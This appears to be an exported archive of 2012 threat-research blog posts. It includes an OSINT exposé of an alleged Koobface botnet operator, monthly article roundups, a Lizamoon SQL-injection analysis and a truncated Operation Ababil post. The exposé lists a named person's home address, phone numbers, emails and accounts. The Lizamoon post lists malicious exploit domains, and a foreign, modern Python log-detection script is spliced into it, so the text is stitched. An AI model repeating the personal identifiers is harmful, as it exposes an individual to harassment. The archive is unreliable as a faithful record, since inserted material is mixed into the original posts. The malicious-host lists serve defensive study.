Who's Behind the Koobface Botnet? - An OSINT Analysis (2012-01-09 16:59)

It's full disclosure time.

In this post, I will perform an OSINT analysis, exposing one of the key botnet masters behind the infamous Koobface botnet, which I have been [1]extensively profiling and infiltrating since day one. I will include photos of the botnet master, his telephone numbers, multiple email addresses, the license plate of a BMW, and directly connect him with the infrastructure - now offline or migrated to a different place - of Koobface 1.0.

The analysis is based on a single mistake that the botnet master made, namely using his personal email for registering a domain parked within Koobface's command and control infrastructure, which at a particular moment in time was directly redirecting to the ubiquitous fake YouTube page pushed by the Koobface botnet.

Let's start from the basics. Here's an excerpt from [2]previous research conducted on the Koobface botnet:

However, what the Koobface gang did was to register a new domain and use it as Koobface C&C, again parked at the same IP, which remains active - zaebalinax.com Email: krotreal@gmail.com - 78.110.175.15 - in particular zaebalinax.com/the/?pid=14010 which is [3]redirecting to the Koobface botnet. Two more domains were also registered and parked there, ul5jul.com and umidsummer.com - Email: 2009polevandrey@mail.ru - which remain in stand-by mode, at least for the time being.

The Koobface botnet master's biggest mistake is using the Koobface infrastructure for hosting a domain that was registered with the botnet master's personal email address. In this case that is zaebalinax.com and krotreal@gmail.com.

zaebalinax.com is literally translated to "Gave up on Linux". UPDATED: Multiple readers have contacted me to point out that zaebalinax is actually translated to "f*ck you all" or "you all are pissing me off".

The same email krotreal@gmail.com was used to [4]advertise the sale of Egyptian Sphynx kittens on 05.09.2007:

Sphynx (kitten) (St. Petersburg)

E-mail:

Sale Sphynx kittens.

Kittens are pedigree.

Fully immunized.

Kittens are very playful and funny.

Girl - a pure black color,

boy - a black iridescent with in turn.

Anton.

Tel. +79219910190

09/05/2007
The following telephone belonging to Anton was provided - +79219910190. The interesting part is that the same telephone was also used in [5]another advertisement, this time for the sale of a BMW:

Photos of the BMW, offered for sale, by the same Anton that 
was using the Koobface infrastructure to host 

zaebalinax.com Email: krotreal@gmail.com: 
License plate for Anton's newest BMW:

Upon further analysis, it becomes evident that his real name is Anton Nikolaevich Korotchenko (Антон Николаевич Коротченко). Here are more details of his online activities:

Real name: Anton Nikolaevich Korotchenko (Антон Николаевич Коротченко)

City of origin: St. Petersburg 

Primary address: Omskaya st. 26-61; St. Petersburg; 
Leningradskaya oblast,197343 

Associated phone numbers obtained through OSINT 
analysis, not whois records: 

+79219910190 

+380505450601 

050-545-06-01 

ICQ - 444374 

Emails: krotreal@yahoo.com 

krotreal@gmail.com 

krotreal@mail.ru 

krotreal@livejournal.com 

newfider@rambler.ru 

WM identification (WEB MONEY): 425099205053

Twitter account: [6]@KrotReal; [7]@Real_Koobface

Flickr account: [8]KrotReal 



Vkontakte.ru Account: [9]KrotReal; [10]tonystarx 

Foursquare Account: [11]KrotReal

Photos of Koobface botnet's master Anton Nikolaevich Korotchenko (Антон Николаевич Коротченко):

Also, [12]a chat log from 2003 identifies KrotReal while he's using the following IP - krotreal@ip-534.dialup.cl.spb.ru

[13] How do you trigger a change that would ultimately affect the entire cybercrime ecosystem? By personalizing cybercrime.

Go through previous research conducted on the 
Koobface botnet: 

[14] Koobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 

[15] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[16] Koobface Gang Responds to the "10 Things You Didn't 
Know About the Koobface Gang Post" 

[17] 10 things you didn't know about the Koobface gang 

[18] How the Koobface Gang Monetizes Mac OS X Traffic 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model 

[21] From the Koobface Gang with Scareware Serving 
Compromised Site 

[22] Koobface Botnet Starts Serving Client-Side Exploits 

[23] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[24] Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 

[25] Koobface - Come Out, Come Out, Wherever You Are 

[26] Dissecting Koobface Worm's Twitter Campaign 

[27] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[28] Koobface Botnet Dissected in a TrendMicro Report 

[29] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[30] Movement on the Koobface Front - Part Two 

[31] Movement on the Koobface Front 

[32] Dissecting the Koobface Worm's December Campaign 



[33] The Koobface Gang Mixing Social Engineering Vectors 

[34] Dissecting the Latest Koobface Facebook Campaign 
Summarizing ZDNet's Zero Day Posts for January (2012-02-02 00:59)

The following is a brief summary of all of my posts at ZDNet's Zero Day for January, 2012. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]'Most beautiful' scams proliferate on Facebook

02. [4]Android users hit by scareware scam

03. [5]'Remove Facebook Timeline' themed scam circulating on Facebook

04. [6]Fake Kim Jong-il video distributing malware

05. [7]Researchers spot pharmaceutical spam campaign using QR Codes

06. [8]Report: Conficker and AutoRun infections proliferating

07. [9]Researchers spot scammers using fake browser plug-ins

08. [10]New variants of premium rate SMS trojan 'RuFraud' detected in the wild

09. [11]Research: Spammers actively harvesting emails from Twitter in real-time

10. [12]DreamHost hacked, mass password-reset issued
Summarizing Webroot's Threat Blog Posts for January (2012-02-02 01:07)

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for January, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter:

01. [3]Millions of harvested emails offered for sale

02. [4]Email hacking for hire going mainstream

03. [5]Mass SQL injection attack affects over 200,000 URLs

04. [6]A peek inside the PickPocket Botnet

05. [7]A peek inside the Cythosia v2 DDoS Bot

06. [8]Google announces new anti-malware features in Chrome

07. [9]Adobe issues a patch for critical security holes in Reader and Acrobat

08. [10]Inside a clickjacking/likejacking scam distribution platform for Facebook

09. [11]Zappos.com hacked, 24 million users affected

10. [12]Inside AnonJDB - a Java based malware distribution platform for drive-by downloads

11. [13]How malware authors evade antivirus detection

12. [14]A peek inside the Umbra malware loader

13. [15]How phishers launch phishing attacks

14. [16]Researchers intercept a client-side exploits serving malware campaign

15. [17]A peek inside the uBot malware bot

16. [18]Cisco releases 'Cisco Global Threat Report' for 4Q11

17. [19]Cybercriminals generate malicious Java applets using DIY tools

launch-phishing-attacks/
Summarizing ZDNet's Zero Day Posts for February (2012-03-07 23:04)

The following is a brief summary of all of my posts at ZDNet's Zero Day for February, 2012. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]Spamvertised 'Tax information needed urgently' emails lead to malware

02. [4]Researchers spot a fake version of Temple Run on Android's Market

03. [5]Which are the most commonly observed Web exploits in the wild?

04. [6]Cryptome.org hacked, serving client-side exploits

05. [7]Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

06. [8]Anonymous launches 'Operation Global Blackout', aims to DDoS the Root Internet servers

07. [9]Report: malware pushed by affiliate networks remains the primary growth factor of the cybercrime ecosystem

08. [10]Cutwail botnet resurrects, launches massive malware campaigns using HTML attachments

09. [11]New Mac OS X trojan spotted in the wild

10. [12]Spamvertised 'Scan from a HP OfficeJet' emails lead to exploits and malware

11. [13]XSS Flaw discovered in Skype's Shop, user accounts targeted

This post has been reproduced from [14]Dancho
Summarizing Webroot's Threat Blog Posts for February (2012-03-07 23:18)

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for February, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter:

01. [3]Research: Google's reCAPTCHA under fire

02. [4]Spamvertised 'You have 1 lost message on Facebook' campaign leads to pharmaceutical scams

03. [5]A peek inside the Smoke Malware Loader

04. [6]Researchers spot Citadel, a ZeuS crimeware variant

05. [7]Researchers intercept two client-side exploits serving malware campaigns

06. [8]Pharmaceutical scammers launch their own Web contest

07. [9]The United Nations hacked, Team Poison claims responsibility

08. [10]Report: Internet Explorer 9 leads in socially-engineered malware protection

09. [11]Twitter adds HTTPS support by default

10. [12]Spamvertised "Hallmark ecard" campaign leads to malware

11. [13]Report: 3,325% increase in malware targeting the Android OS

12. [14]Why relying on antivirus signatures is simply not enough anymore

13. [15]Researchers intercept malvertising campaign using Yahoo's ad network

14. [16]A peek inside the Ann Malware Loader

15. [17]Spamvertised 'Termination of your CPA license' campaign serving client-side exploits

16. [18]How cybercriminals monetize malware-infected hosts

17. [19]A peek inside the Elite Malware Loader

18. [20]BlackHole exploit kit gets updated with new features
Summarizing ZDNet's Zero Day Posts for March (2012-04-09 19:50)

The following is a brief summary of all of my posts at ZDNet's Zero Day for March, 2012. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]New Mac OS X malware variant spotted in the wild

02. [4]Researchers intercept targeted malware attack against Tibetan organizations

03. [5]Skype vouchers themed site serving client-side exploits and malware

04. [6]Stratfor subscribers targeted by passwords-stealing malicious emails

05. [7]Spoofed LinkedIn emails serving client-side exploits

06. [8]Fake YouTube sites target Syrian activists with malware

07. [9]New Mac OS X malware variant spotted in the wild

08. [10]Spamvertised 'DHL Tracking Notification' emails serve malware

09. [11]Compromised WordPress sites serving client-side exploits and malware

10. [12]'Pixmania.com payment order detail' themed emails serving SpyEye crimeware

11. [13]Fake 'Roar of the Pharaoh' Android game spreads premium-rate SMS trojan

12. [14]Research: Many mobile password managers offer false feeling of security

13. [15]Targeted Pro-Tibetan malware attacks hit Mac OS X users

14. [16]Opera for Mac OS X patches 6 security holes

15. [17]Cybercriminals use Twitter, LinkedIn, Baidu, MSDN as command and control infrastructure

16. [18]Facebook phishing attack targets Syrian activists
Summarizing Webroot's Threat Blog Posts for March (2012-04-09 20:03)

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for March, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter:

01. [3]New service converts malware-infected hosts into anonymization proxies

02. [4]Spamvertised 'Temporary Limit Access To Your Account' emails lead to Citi phishing emails

03. [5]A peek inside the Darkness (Optima) DDoS Bot

04. [6]Research: proper screening could have prevented 67% of abusive domain registrations

05. [7]Spamvertised 'Your accountant license can be revoked' emails lead to client-side exploits and malware

06. [8]Spamvertised 'Google Pharmacy' themed emails lead to pharmaceutical scams

07. [9]Research: U.S. accounts for 72% of fraudulent pharmaceutical orders

08. [10]Millions of harvested U.S. government and U.S. military email addresses offered for sale

09. [11]Spamvertised 'Your tax return appeal is declined' emails serving client-side exploits and malware

10. [12]Malicious USPS-themed emails circulating in the wild

11. [13]Spamvertised LinkedIn notifications serving client-side exploits and malware

12. [14]Tens of thousands of web sites affected in ongoing mass SQL injection attack

13. [15]Spamvertised Verizon-themed 'Your Bill Is Now Available' emails lead to ZeuS crimeware

14. [16]Spamvertised 'Scan from a Hewlett-Packard ScanJet' emails lead to client-side exploits and malware
Summarizing ZDNet's Zero Day Posts for April (2012-05-08 19:20)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for April, 2012. You can subscribe to my [2]personal RSS feed, [3]Zero Day's main feed, or follow me on Twitter:

01. [4]Researcher: 50 percent of Mac OS X users still running outdated Java versions

02. [5]Malicious version of Angry Birds Space spotted in the wild

03. [6]French gaming site serving ZeuS crimeware for over 8 weeks

04. [7]New ransomware variants spotted in the wild

05. [8]Nuclear Pack exploit kit introduces anti-honeyclient crawling feature

This post has been reproduced from [9]Dancho Danchev's blog. Follow him [10]on Twitter.

4. http://www.zdnet.com/blog/security/researcher-50-percent-of-mac-os-x-users-still-running-outdated-java-versions/11512
Summarizing Webroot's Threat Blog Posts for April

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for April, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter:

01. [3]Adobe patches critical security flaws, introduces auto-updating mechanism

02. [4]Email hacking for hire going mainstream - part two

03. [5]Spamvertised 'US Airways' themed emails serving client-side exploits and malware

04. [6]New underground service offers access to hundreds of hacked PCs

05. [7]Google's Chrome patches 12 'high risk' security vulnerabilities

06. [8]Adobe plans to issue Acrobat Reader 'security update' next week

07. [9]Microsoft issues 6 security bulletins on 'Patch Tuesday'

08. [10]Adobe patches critical Reader and Acrobat security vulnerabilities

09. [11]Hewlett-Packard shipping malware-infected compact flash cards

10. [12]New DIY email harvester released in the wild

11. [13]Upcoming Webroot briefing at InfoSec, 2012, London - "Current and Emerging Trends Within the Cybercrime Ecosystem"

This post has been reproduced from [14]Dancho

1. http://blog.webroot.com/

2. http://feeds2.feedburner.com/WebrootThreatBlog

3. http://blog.webroot.com/2012/04/02/adobe-patches-critical-security-flaws-introduces-auto-updating-mechanism/

4. http://blog.webroot.com/2012/04/02/email-hacking-for-hire-going-mainstream-part-two/

5. http://blog.webroot.com/2012/04/03/spamvertised-us-airways-themed-emails-serving-client-side-exploits-and-malware/

6. http://blog.webroot.com/2012/04/05/new-underground-service-offers-access-to-hundreds-of-hacked-pcs/

7. http://blog.webroot.com/2012/04/06/googles-chrome-patches-12-high-risk-security-vulnerabilities/

8. http://blog.webroot.com/2012/04/06/adobe-plans-to-issue-acrobat-reader-security-update-next-week/

9. http://blog.webroot.com/2012/04/12/microsoft-issues-6-security-bulletins-on-patch-tuesday/

10. http://blog.webroot.com/2012/04/13/adobe-patches-critical-reader-and-acrobat-security-vulnerabilities/
11. http://blog.webroot.com/2012/04/14/hewlett-packard-shipping-malware-infected-compact-flash-cards/

12. http://blog.webroot.com/2012/04/16/new-diy-email-harvester-released-in-the-wild/

13. http://blog.webroot.com/2012/04/23/upcoming-webroot-briefing-at-infosec-2012-london-current-and-emerging-trends-within-the-cybercrime-ecosystem/

14. http://ddanchev.blogspot.com/

15. http://twitter.com/danchodanchev

Dissecting the Ongoing Client-Side Exploits Serving 
Lizamoon Mass SQL Injection Attacks (2012-05-08 
21:36) 

The [1]Lizamoon mass [2]SQL injection attacks gang is continuing to efficiently [3]inject malicious code on hundreds of thousands of legitimate sites, for the purpose of serving [4]fake security software - also known as scareware - and client-side exploits.

The latest round of the campaign is serving client-side exploits through multiple redirections that take place once the end user loads the malicious script embedded on legitimate sites. In comparison, in the past the gang used to monetize the hijacked traffic by serving scareware and bogus Adobe Flash Players.

What are some of the currently SQL injected malicious domains? How does the redirection take place? Did they put basic QA (quality assurance) tactics in place? Let's find out.

Currently injected malicious domains are parked at 31.210.100.242 (AS42926, RADORE Hosting), with the following domains currently responding to that IP:

skdjui.com/r.php - Email: jamesnorthone@hotmailbox.com 

njukol.com/r.php - Email: jamesnorthone@hotmailbox.com 

hnjhkm.com/r.php - Email: 
jamesnorthone@hotmailbox.com 

nikjju.com/r.php - Email: jamesnorthone@hotmailbox.com 

hgbyju.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhjiku.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhijku.com/r.php - Email: jamesnorthone@hotmailbox.com 

werlontally.net/r.php - Email: 
jamesnorthone@hotmailbox.com 

[5]March's round of malicious domains was hosted at 91.226.78.148 (AS56697, LISIK-AS OOO "Byuro Remontov "FAST"").

The redirection takes us to these two domains:

www3.topcumaster.com - 75.102.21.120 (AS23352, SERVERCENTRAL)

Parked at 75.102.21.120 are also the following domains: 

www3.personal-scanera.com - Email: 
benji.rubes@yahoo.com 

www3.personalvoguard.com - Email: 
benji.rubes@yahoo.com 

www3.hard-zdsentinel.com - Email: 
benji.rubes@yahoo.com 

www3.bestbxcleaner.com - Email: 
benji.rubes@yahoo.com 
www3.topcumaster.com - Email: benji.rubes@yahoo.com

www3.safe-defensefu.com - Email: 
benji.rubes@yahoo.com 

and www1.safe-wnmaster.it.cx - 217.23.8.123 (AS49981, WorldStream)

Parked on 217.23.8.123 are also the following client-side 
exploits serving domains part of the Lizamoon mass 

SQL injection attacks: 

www1.thebestscannerdc.it.cx/i.html
www1.safebh-defense.it.cx/i.html
www1.strongdkdefense.it.cx/i.html
www2.best-czsuite.it.cx/i.html
www1.smartmasterf.it.cx/i.html
www1.simplescanerei.it.cx/i.html
www1.bestic-network.it.cx/i.html
www1.topqonetwork.it.cx/i.html
www2.topasnetwork.it.cx/i.html
www1.powerynetwork.it.cx/i.html
www1.simplemasterzk.it.cx/i.html
www1.powerneholder.it.cx/i.html
www1.personalkochecker.it.cx/i.html
www1.smarthdschecker.it.cx/i.html
www1.safebacleaner.it.cx/i.html
www1.strongzkcleaner.it.cx/i.html
www1.topumcleaner.it.cx/i.html
www1.topgdscanner.it.cx/i.html
www1.smartwoscanner.it.cx/i.html
www1.safe-wnmaster.it.cx/i.html
www1.powervmaster.it.cx/i.html
www1.top-armyvs.it.cx/i.html
www2.saveocsoft.it.cx/i.html
www1.top-zjsoft.it.cx/i.html
www1.powerdefensekt.it.cx/i.html
www1.best-scanersw.it.cx/i.html
www1.powermb-security.it.cx/i.html
www1.strongxd-security.it.cx/i.html
www1.strongbtsecurity.it.cx/i.html

Client-side exploits, [6]CVE-2010-0188 and [7]CVE-2012-0507 in particular, are served through the i.html file located on these hosts. For the client-side exploitation to take place, the redirection chain must be followed correctly; otherwise the server returns a "404 Error Message" when a specific file that is part of the campaign is requested. There are no HTTP referrer checks in place, at least for the time being. What's particularly interesting about the current campaign is that for a period of time it will purposely serve a "404 Error Message" no matter what happens. 
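To turn the redirection chain described above into something a defender can check, here is an added example (not code from the original post) that walks proxy log lines, maps each request onto a chain stage using the r.php, www3.* and wwwN.*.it.cx/i.html hosts named in the post, and reports per client whether the full chain was walked, whether i.html was actually delivered (200) or refused by the campaign's gating (404), and which legitimate site carried the injection. The log format, the client addresses and the hosts example-shop.test and intranet.test are constructed for the demo; the function names are mine.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Stage 1: the injected r.php hosts named in the post.
INJECTED_HOSTS = {
    "skdjui.com", "njukol.com", "hnjhkm.com", "nikjju.com",
    "hgbyju.com", "uhjiku.com", "uhijku.com", "werlontally.net",
}
# Stage 2: the www3.* hosts the r.php redirect lands on (named in the post).
INTERMEDIATE_HOSTS = {
    "www3.topcumaster.com", "www3.personal-scanera.com",
    "www3.personalvoguard.com", "www3.hard-zdsentinel.com",
    "www3.bestbxcleaner.com", "www3.safe-defensefu.com",
}
# Stage 3: every exploit host in the post is wwwN.<label>.it.cx serving i.html.
EXPLOIT_HOST_RE = re.compile(r"^www\d\.[a-z0-9-]+\.it\.cx$")

# Constructed log format (an assumption for this demo):
#   <epoch> <client> <url> "<referer>" <status>
LOG_RE = re.compile(r'^(\d+) (\S+) (\S+) "([^"]*)" (\d{3})$')


@dataclass
class Request:
    ts: int
    client: str
    url: str
    referer: str
    status: int


def parse_line(line: str) -> Request | None:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, url, referer, status = m.groups()
    return Request(int(ts), client, url, referer, int(status))


def stage_of(req: Request) -> str | None:
    # Map a request onto a chain stage, or None if it is unrelated.
    parts = urlsplit(req.url)
    host = (parts.hostname or "").lower()
    if host in INJECTED_HOSTS and parts.path == "/r.php":
        return "injected"
    if host in INTERMEDIATE_HOSTS:
        return "intermediate"
    if EXPLOIT_HOST_RE.match(host) and parts.path == "/i.html":
        return "exploit"
    return None


def analyze(lines: list[str]) -> dict[str, dict]:
    """One finding per client that touched any stage of the chain:
    complete_chain (injected -> intermediate -> exploit, in time order),
    exploit_delivered (i.html answered 200; a 404 is the campaign's gating
    refusing a request that did not arrive via the chain) and landing_site
    (referer host of the r.php hit: the legitimate site carrying the injection)."""
    hits: dict[str, list[tuple[str, Request]]] = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        stage = stage_of(req)
        if stage is not None:
            hits[req.client].append((stage, req))
    findings: dict[str, dict] = {}
    for client, seen in hits.items():
        seen.sort(key=lambda item: item[1].ts)
        stages = [s for s, _ in seen]
        # first-occurrence index of each stage, -1 when never seen
        first = [stages.index(s) if s in stages else -1
                 for s in ("injected", "intermediate", "exploit")]
        complete = min(first) >= 0 and first[0] < first[1] < first[2]
        delivered = any(s == "exploit" and r.status == 200 for s, r in seen)
        landing = next((urlsplit(r.referer).hostname for s, r in seen
                        if s == "injected" and r.referer), None)
        findings[client] = {
            "stages": stages,
            "complete_chain": complete,
            "exploit_delivered": delivered,
            "landing_site": landing,
        }
    return findings


# Constructed sample: 10.0.0.5 walks the full chain from a compromised shop
# page; 10.0.0.9 requests i.html directly and is refused with a 404.
SAMPLE_LOG = """\
1336500001 10.0.0.5 http://example-shop.test/products.php "" 200
1336500002 10.0.0.5 http://nikjju.com/r.php "http://example-shop.test/products.php" 302
1336500003 10.0.0.5 http://www3.topcumaster.com/ "http://nikjju.com/r.php" 302
1336500004 10.0.0.5 http://www1.safe-wnmaster.it.cx/i.html "http://www3.topcumaster.com/" 200
1336500010 10.0.0.9 http://www2.best-czsuite.it.cx/i.html "" 404
1336500020 10.0.0.7 http://intranet.test/wiki "" 200
"""
```

The landing_site value is the one to act on: it names the legitimate page that still carries the injected script, while the 404 case shows that a client was exposed even though the campaign's gating refused to serve i.html.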

Updates will be posted, as soon as new developments 
emerge. 

Related posts: 

• [8]SQL Injection Through Search Engines Reconnaissance 

• [9]Massive SQL Injections Through Search Engine's Reconnaissance - Part Two 

• [10]Massive SQL Injection Attacks - the Chinese Way 

• [11]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

• [12]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware 

• [13]Dissecting the WordPress Blogs Compromise at Network Solutions 

• [14]Yet Another Massive SQL Injection Spotted in the Wild 

• [15]Smells Like a Copycat SQL Injection In the Wild 

• [16]Fast-Fluxing SQL Injection Attacks 

• [17]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 
6. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188 
Summarizing ZDNet's Zero Day Posts for May (2012-06-06 18:15) 

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for May, 2012. You can subscribe to my [2]personal RSS feed, [3]Zero Day's main feed, or follow me on Twitter: 
01. [4]Is Mozilla's Firefox 'click-to-play' feature a sound 
response to drive-by malware attacks? 

02. [5]Rogue Firefox extension hijacks browser sessions 

03. [6]Spamvertised 'PayPal payment notifications' lead to 
client-side exploits and malware 

04. [7]Israeli Institute for National Security Studies 
compromised, serving Poison Ivy DIY malware 

05. [8]Researchers spot new Web malware exploitation kit 

06. [9]2012 Olympics themed malware circulating in the wild 

07. [10]New ransomware impersonates the U.S Department 
of Justice 

08. [11]Localized ransomware variants circulating in the wild 

09. [12]Cybercriminals offer bogus fraud insurance services 

10. [13]Researchers spot fake mobile antivirus scanners on 
Google Play 

11. [14]The cyber security implications of Iran's government- 
backed antivirus software 

12. [15]Q &A of the week: 'The current state of the cyber 
warfare threat' featuring Jeffrey Carr 

13. [16]Researchers intercept Tatanga malware bypassing 
SMS based transaction authorization 

14. [17]New SpyEye plugin takes control of crimeware 
victims' webcam and microphone 



15. [18]Comcast phishing site contains valid TRUSTe seal 

16. [19]Q &A of the Week: The current state of the 
cybercrime ecosystem' featuring Mikko Hypponen 

This post has been reproduced from [20]Dancho Danchev's blog. Follow him [21]on Twitter. 
Summarizing Webroot's Threat Blog Posts for May (2012-06-06 18:31) 

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for May, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter: 

01. [3]London's InfoSec 2012 Event - recap 

02. [4]Managed SMS spamming services going mainstream 

03. [5]A peek inside a boutique cybercrime-friendly E-shop 

04. [6]Cybercriminals release 'Sweet Orange' - new web 
malware exploitation kit 

05. [7]Spamvertised 'Pizzeria Order Details' themed 
campaign serving client-side exploits and malware 

06. [8]Poison Ivy trojan spreading across Skype 

07. [9]A peek inside a managed spam service 
08. [10]Ongoing 'LinkedIn Invitation' themed campaign 
serving client-side exploits and malware 

09. [11]Spamvertised bogus online casino themed emails 
serving adware 

10. [12]Spamvertised 'YouTube Video Approved' and 'Twitter Support' themed emails lead to pharmaceutical scams 

11. [13]A peek inside a boutique cybercrime-friendly E-shop 
- part two 

12. [14]Spamvertised CareerBuilder themed emails serving 
client-side exploits and malware 

13. [15]Pop-ups at popular torrent trackers serving 
W32/Casonline adware 

14. [16]'Windstream bill' themed emails serving client-side 
exploits and malware 
Summarizing ZDNet's Zero Day Blog Posts for June (2012-07-10 19:02) 

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for June, 2012. You can subscribe to [2]Zero Day's main feed, or follow me on Twitter: 

01. [3]Fake Gmail Android application steals personal data 

02. [4]Facebook begins notifying DNSChanger victims 

03. [5]French E-voting portal requires insecure Java plugin 

04. [6]Credit card fraudsters sentenced in the U.K 

05. [7]North Korea ships malware-infected games to South 
Korean users, uses them to launch DDoS attacks 










06. [8]Q &A of the Week - Tales from the Underground' 
featuring Brian Krebs 

07. [9]24 cybercriminals arrested in 'Operation Card Shop' 

08. [10]Silent security updates coming to Apple's OS X 
Mountain Lion 
09. [11]BlackHole exploit kit experimenting with 'pseudo-random domains' feature 

10. [12]Which is the most popular antivirus software? 

11. [13]Winamp 5.63 fixes four critical security 
vulnerabilities 

12. [14]Chrome 20 fixes 20 security vulnerabilities 
Summarizing Webroot's Threat Blog Posts for June (2012-07-10 19:16) 

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for June, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter: 

01. [3]Cybercriminals infiltrate the music industry by offering 
full newly released albums for just $1 

02. [4]A peek inside a boutique cybercrime-friendly E-shop - 
part three 

03. [5]DDoS for hire services offering to 'take down your 
competitor's web sites' going mainstream 

04. [6]Skype propagating Trojan targets Syrian activists 

05. [7]Spamvertised 'UPS Delivery Notification' emails 
serving client-side exploits and malware 

06. [8]Mozilla patches critical security vulnerabilities in 
Firefox and Thunderbird 

07. [9]Spamvertised 'DHL Package delivery report' emails 
serving malware 
08. [10]Spamvertised 'Your Amazon.com order confirmation' emails serving client-side exploits and malware 

09. [11]Cybercriminals populate Scribd with bogus adult content, spread malware using Comodo Backup 

10. [12]Oracle and Apple patch critical Java security 
vulnerabilities 

11. [13]Spamvertised 'YourPaypal Ebay.com payment' emails 
serving client-side exploits and malware 



12. [14]'Create a Cartoon of You' ads serving MyWebSearch 
toolbar 

13. [15]Spamvertised 'Your UPS delivery tracking' emails 
serving client-side exploits and malware 

14. [16]Spamvertised 'Confirm PayPal account' notifications 
lead to phishing sites 

15. [17]Spamvertised 'DHL Express Parcel Tracking 
Notification' emails serving malware 

16. [18]Spamvertised bogus online casino themed emails 
serving W32/Casonline 
Summarizing ZDNet's Zero Day Blog Posts for July (2012-08-23 18:16) 

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for July, 2012. You can subscribe to [2]Zero Day's main feed, or follow me on Twitter: 

01. [3]Security flaw found in Amazon's Kindle Touch 

02. [4]New contacts stealing Android malware spotted in the wild 

03. [5]Firefox 14 fixes 5 critical security vulnerabilities 

04. [6]Bogus Google Files site earns revenue through 
premium rate SMS micro payments 

05. [7]Research: 80 % of Carberp infected computers had 
antivirus software installed 
Summarizing Webroot's Threat Blog Posts for July (2012-08-23 19:05) 

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for July, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter: 

01. [3]Cybercriminals launch managed SMS flooding services 

02. [4]117,000 unique U.S visitors offered for malware 
conversion 

03. [5]Phishing campaign targeting Gmail, Yahoo, AOL and 
Hotmail spotted in the wild 

04. [6]What's the underground market's going rate for a 
thousand U.S based malware infected hosts? 

05. [7]Spamvertised American Airlines themed emails lead to 
Black Hole exploit kit 

06. [8]Online dating scam campaign currently circulating in 
the wild 

07. [9]New Russian service sells access to compromised 
social networking accounts 

08. [10]Cybercriminals impersonate UPS in client-side 
exploits and malware serving spam campaign 



09. [11]Russian Ask.fm spamming tool spotted in the wild 

10. [12]Spamvertised Intuit themed emails lead to Black 
Hole exploit kit 

11. [13]Cybercriminals impersonate Booking.com, serve malware using bogus 'Hotel Reservation Confirmation' themed emails 

12. [14]Spamvertised Craigslist themed emails lead to Black 
Hole exploit kit 

13. [15]Cybercriminals impersonate law enforcement, 
spamvertise malware-serving 'Speeding Ticket' themed 
emails 

14. [16]Spamvertised 'Download your USPS Label' themed 
emails serve malware 

15. [17]Cybercriminals target Twitter, spread thousands of 
exploits and malware serving tweets 
16. [18]Russian spammers release Skype spamming tool 

17. [19]Spamvertised 'Your Ebay funds are cleared' themed 
emails lead to Black Hole exploit kit 

This post has been reproduced from [20]Dancho Danchev's blog. Follow him [21]on Twitter. 
Dissecting 'Operation Ababil' - an OSINT Analysis (2012-09-28 00:25) 

Provoked by a questionable online video posted on YouTube, Muslims from around the world united in an apparent [1]opt-in botnet crowdsourcing campaign aiming to launch a DDoS (distributed denial of service) attack against YouTube for keeping the video online, and against several [2]major U.S banks and financial institutions. 

Dubbed "Operation Ababil", and operated by the Izz ad-Din al-Qassam a.k.a Qassam Cyber Fighters, the campaign appears to have had a limited, but highly visible impact on the targeted web sites. Just like in every other crowdsourced opt-in botnet campaign, such as the "[3]Coordinated Russia vs Georgia cyber attack in progress", the "[4]Iranian opposition launches organized cyber attack against pro-Ahmadinejad sites", the "[5]Electronic Jihad v3.0 - What Cyber Jihad Isn't" campaign, and the "[6]The DDoS Attack Against CNN.com" campaign, political sentiments over the attribution element seem to have orbited around the notion that it was [7]nation-sponsored by the Iranian government. 

What's so special about this attack? Did the individuals behind it possess sophisticated hacking or coding abilities? Was it the work of hacktivists crowdsourcing bandwidth, or was it actually sponsored by the Iranian government? Can we even talk about attack attribution given that the group claiming responsibility for the attacks doesn't have a strong digital fingerprint? 

In this post, I'll perform an OSINT (open source intelligence) analysis aiming to expose one of the individuals who is part of the group that organized the campaign, spread their propaganda message to as many Muslim Facebook groups as possible, and actually claimed responsibility for the attacks once they took place. 

The campaign originally began with a message left on Pastebin.com by the Qassam Cyber Fighters group announcing "Operation Ababil": 
